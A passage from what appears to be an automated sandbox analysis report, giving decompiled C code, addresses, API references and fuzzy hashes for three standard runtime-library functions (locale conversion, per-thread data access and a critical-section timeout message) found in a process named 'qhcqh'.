                                                                                                                        0x00c5a8a2
                                                                                                                        0x00c5a8a8
                                                                                                                        0x00c5a8aa
                                                                                                                        0x00c5a8ad
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8ad
                                                                                                                        0x00c5a84a
                                                                                                                        0x00c5a84d
                                                                                                                        0x00c5a84f
                                                                                                                        0x00c5a855
                                                                                                                        0x00c5a855
                                                                                                                        0x00000000
                                                                                                                        0x00c5a825
                                                                                                                        0x00c5a825
                                                                                                                        0x00c5a82a
                                                                                                                        0x00c5a82e
                                                                                                                        0x00c5a82e
                                                                                                                        0x00000000
                                                                                                                        0x00c5a82a
                                                                                                                        0x00c5a823

                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C5A83D
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00C5A871
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,00C5826E,00000109,00BFBBEF,00000003), ref: 00C5A8A2
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00C5826E,00000109,00BFBBEF,00000003), ref: 00C5A910
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 51030d33fee9b7c2e28500455788a0c08365221be27ac57436a377d331cca205
                                                                                                                        • Instruction ID: 10ae353749c2280e1e473021c772df931332a570dcdad8c1e070b86169efcd5f
                                                                                                                        • Opcode Fuzzy Hash: 51030d33fee9b7c2e28500455788a0c08365221be27ac57436a377d331cca205
                                                                                                                        • Instruction Fuzzy Hash: 0F319335A00286EFDB10DF66C880AAD7BA5FF01312B1486A9E8619B1D1D730DEC6DB56
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C53EEC Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00C53EEC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xc5d528);
				E00C52D64(__ebx, __edi, __esi);
				_t29 = E00C54229(__ebx, _t31);
				_t13 =  *0xc5f87c; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00C5226D(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0xc5f960; // 0xc5f888
					 *((intOrPtr*)(_t30 - 0x1c)) = E00C53EAE(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00C53F56();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00C54229(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00C52FAC(_t25, 0x20);
				}
				return E00C52DA9(_t29);
			}









                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eee
                                                                                                                        0x00c53ef3
                                                                                                                        0x00c53efd
                                                                                                                        0x00c53eff
                                                                                                                        0x00c53f07
                                                                                                                        0x00c53f2b
                                                                                                                        0x00c53f2d
                                                                                                                        0x00c53f33
                                                                                                                        0x00c53f37
                                                                                                                        0x00c53f3a
                                                                                                                        0x00c53f45
                                                                                                                        0x00c53f48
                                                                                                                        0x00c53f4f
                                                                                                                        0x00c53f09
                                                                                                                        0x00c53f09
                                                                                                                        0x00c53f0d
                                                                                                                        0x00000000
                                                                                                                        0x00c53f0f
                                                                                                                        0x00c53f14
                                                                                                                        0x00c53f14
                                                                                                                        0x00c53f0d
                                                                                                                        0x00c53f19
                                                                                                                        0x00c53f1d
                                                                                                                        0x00c53f22
                                                                                                                        0x00c53f2a

                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00C53EF8
                                                                                                                          • Part of subcall function 00C54229: __getptd_noexit.LIBCMT ref: 00C5422C
                                                                                                                          • Part of subcall function 00C54229: __amsg_exit.LIBCMT ref: 00C54239
                                                                                                                        • __getptd.LIBCMT ref: 00C53F0F
                                                                                                                        • __amsg_exit.LIBCMT ref: 00C53F1D
                                                                                                                        • __lock.LIBCMT ref: 00C53F2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521780317-0
                                                                                                                        • Opcode ID: f41ed97df1250289f90f0bce3f6649ab0e8da3c2645e15072558884440100120
                                                                                                                        • Instruction ID: b57cda980b02130e016873974d581215e221db61ca43ee41690cb0b1653f607c
                                                                                                                        • Opcode Fuzzy Hash: f41ed97df1250289f90f0bce3f6649ab0e8da3c2645e15072558884440100120
                                                                                                                        • Instruction Fuzzy Hash: 27F0493AD04710CAD624BBE5A806B4D32F0AB01763F504259BC51A7292CB249AC9AA5D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0132FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E0132FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L012DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L01325720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L01325720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                        0x0132fdda
                                                                                                                        0x0132fde2
                                                                                                                        0x0132fde5
                                                                                                                        0x0132fdec
                                                                                                                        0x0132fdfa
                                                                                                                        0x0132fdff
                                                                                                                        0x0132fe0a
                                                                                                                        0x0132fe0f
                                                                                                                        0x0132fe17
                                                                                                                        0x0132fe1e
                                                                                                                        0x0132fe19
                                                                                                                        0x0132fe19
                                                                                                                        0x0132fe19
                                                                                                                        0x0132fe20
                                                                                                                        0x0132fe21
                                                                                                                        0x0132fe22
                                                                                                                        0x0132fe25
                                                                                                                        0x0132fe40

                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0132FDFA
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0132FE01
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0132FE2B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                        • API String ID: 885266447-3903918235
                                                                                                                        • Opcode ID: bd7a5e9f41f59375ae5336ffc4d935031afcd43bdb59579baf399ab57724d21c
                                                                                                                        • Instruction ID: e39244512da2dff8a15c3389cb5877f9b6bb46ae1b1e6aaa2945da032085840c
                                                                                                                        • Opcode Fuzzy Hash: bd7a5e9f41f59375ae5336ffc4d935031afcd43bdb59579baf399ab57724d21c
                                                                                                                        • Instruction Fuzzy Hash: 7CF0C272240211BBE6212A49DC02F73BB6AEB44B30F240218F628565D1EA62E920D6A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%